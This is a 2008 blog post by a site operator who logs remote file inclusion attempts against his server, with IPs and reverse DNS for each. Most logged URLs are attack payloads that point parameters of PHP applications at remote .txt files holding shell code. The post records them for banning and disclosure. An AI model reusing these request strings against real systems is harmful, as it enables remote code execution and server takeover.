Banning IP from spammers

February 17, 2008

We’ve started to get tough on spammers and the likes, anyone who requests something from our server they should not, will be banned by IP address.

We’ll also be recording the IP and RDNS in this post to hopefully gather some useful information that can be of help in the future.

Request: http://www.clickfind.com.au:80/main.php?other=http://www.fgwarez.com/bbs/skin/ting_music/…/usa??
Date Time: Feb 16, 2008 10:47 PM
Remote Address: 205.234.130.198
Reverse DNS: server.ingenieroweb.net

Request: http://www.clickfind.com.au:80/modules/coppermine/themes/default/theme.php?THEME_DIR=http://smolen.org/test.txt???
Date Time: Feb 16, 2008 9:49 PM
Remote Address: 209.126.142.130
Reverse DNS: dish4.net.ibizdns.com

Posted by Australian Search Engine Filed in Other

10 Responses to “Banning IP from spammers”

  1. Australian Search Engine Says:
    February 17, 2008 at 11:29 pm

    Request: http://www.clickfind.com.au:80/order.php?pag=http://www.cartographia.org/ftp/files/source/SinG??
    Date Time: Feb 16, 2008 2:32 PM
    Remote Address: 72.55.143.196
    Reverse DNS: ip-72-55-143-196.static.privatedns.com

  2. Australian Search Engine Says:
    February 24, 2008 at 1:26 am

    Request: http://www.clickfind.com.au:80/components/com_extcalendar/admin_events.php?CONFIG_EXTLANGUAGES_DIR=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt???
    Date Time: Feb 23, 2008 7:33 PM
    Remote Address: 61.14.187.140
    Reverse DNS: Meteor.websiteactive.com

  3. Australian Search Engine Says:
    February 24, 2008 at 1:27 am

    Request: http://www.clickfind.com.au:80/components/com_facileforms/facileforms.frame.php?ff_compath=http://h1.ripway.com/durhaka/cmdasca.txt?????
    Date Time: Feb 23, 2008 8:12 PM
    Remote Address: 61.19.38.155
    Reverse DNS: 61.19.38.155

  4. Australian Search Engine Says:
    February 24, 2008 at 1:27 am

    Request: http://www.clickfind.com.au:80/pivot/modules/module_db.php?pivot_path=http://smolen.org/test.txt???
    Date Time: Feb 23, 2008 4:44 PM
    Remote Address: 85.25.144.182
    Reverse DNS: golf529.server4you.de

  5. Australian Search Engine Says:
    February 28, 2008 at 1:49 am

    Request; http://www.clickfind.com.au:80/administrator/admin/store/admin.php?component_dir=http://www.eshqs.com/error.txt???
    Date Time: Feb 27, 2008 6:02 PM
    Remote Address: 204.15.224.50
    Reverse DNS: mail.wives-in-need.com

  6. Australian Search Engine Says:
    February 29, 2008 at 3:33 am

    Request; http://www.clickfind.com.au:80/2007/cgi-bin/awstats.pl?output=notfounderror/modules/vwar/admin/admin.php?vwar_root=http://keesenmirjam.nl/media/mic22_mod.txt?
    Date Time: Feb 28, 2008 9:41 PM
    Remote Address: 72.232.118.237
    Reverse DNS: 237.118.232.72.static.reverse.ltdomains.com

    Request; http://www.clickfind.com.au:80/main.php?pageURL=http://www.citoyennete-active.org/mambots/content/test.txt???
    Date Time: Feb 28, 2008 5:24 PM
    Remote Address: 203.88.114.169
    Reverse DNS: AT-HP7KQ1S.rtds.aussiehq.net.au

    Request; http://www.clickfind.com.au:80/main.php?s=http://webmail.asl3.umbria.it/admin/inc/albania.txt?????????????????????????
    Date Time: Feb 28, 2008 4:13 PM
    Remote Address: 69.72.221.130
    Reverse DNS: pyar.jaanhost.com

  7. Australian Search Engine Says:
    March 1, 2008 at 9:18 pm

    Request: http://www.clickfind.com.au:80/gb/form.inc.php3?lang=http://smolen.org/test.txt???
    Date Time: Feb 29, 2008 9:58 PM
    Remote Address: 89.174.96.241
    Reverse DNS: p23.progreso.pl

    http://smolen.org/test.txt??? is a php file that they hope gets executed on the server.

    Same as http://webmail.asl3.umbria.it/admin/inc/albania.txt?????????????????????????

    We’ve emailed some of these websites telling them about the file on their server, and to proof its not them who uploaded the file. They can do this by providing the FTP or HTTP log file to us.

  8. Australian Search Engine Says:
    March 1, 2008 at 9:19 pm

    echo “UNITED ALBANIANS aka ALBOSS PARADISE”; in one of the text files tells me that the hackers are from Albania.

  9. Australian Search Engine Says:
    March 3, 2008 at 2:51 am

    Request: http://www.clickfind.com.au:80/board/index.php
    Referer: http://www.clickfind.com.au/board/index.php
    Date Time: Mar 2, 2008 11:16 PM
    Remote Address: 211.52.153.134
    Reverse DNS: d074.dhcp212-198-114.noos.fr

  10. Australian Search Engine Says:
    March 3, 2008 at 3:02 am

    Request: http://www.clickfind.com.au:80/board/index.php
    Referer: http://www.clickfind.com.au/board/index.php
    Date Time: Mar 2, 2008 11:14 PM
    Remote Address: 61.35.100.131

    Request: http://www.clickfind.com.au:80/phpbb2/index.php
    Referer: http://www.clickfind.com.au/phpbb2/index.php
    Date Time: Mar 2, 2008 11:13 PM
    Remote Address: 218.57.11.112
    Reverse DNS: 218.57.11.112

    Request: http://www.clickfind.com.au:80/2008/main.php?content=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt?
    Date Time: Mar 2, 2008 11:37 AM
    Remote Address: 61.47.60.169
    Reverse DNS: dns1.internetthailand.net

    Request: http://www.clickfind.com.au:80/2008/main.php?content=http://www.techbomb.com/fastmicrowave/coges.txt??
    Date Time: Mar 2, 2008 11:26 AM
    Remote Address: 217.197.68.66
    Reverse DNS: ip-217-197-68-66.punkt.pl

    Request: http://www.clickfind.com.au:80/2007/bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=http://216.191.16.12/.shell/site/iyes.txt??
    Date Time: Mar 2, 2008 2:47 AM
    Remote Address: 69.13.187.96
    Reverse DNS: exceptionalhosting.propagation.net

    Request: http://www.clickfind.com.au:80/administrator/admin/store/admin.php?component_dir=http://www.ar-vision.com/z.txt?????
    Date Time: Mar 1, 2008 11:47 PM
    Remote Address: 216.127.86.119
    Reverse DNS: ev1s-216-127-86-119.ev1servers.net

Leave a Reply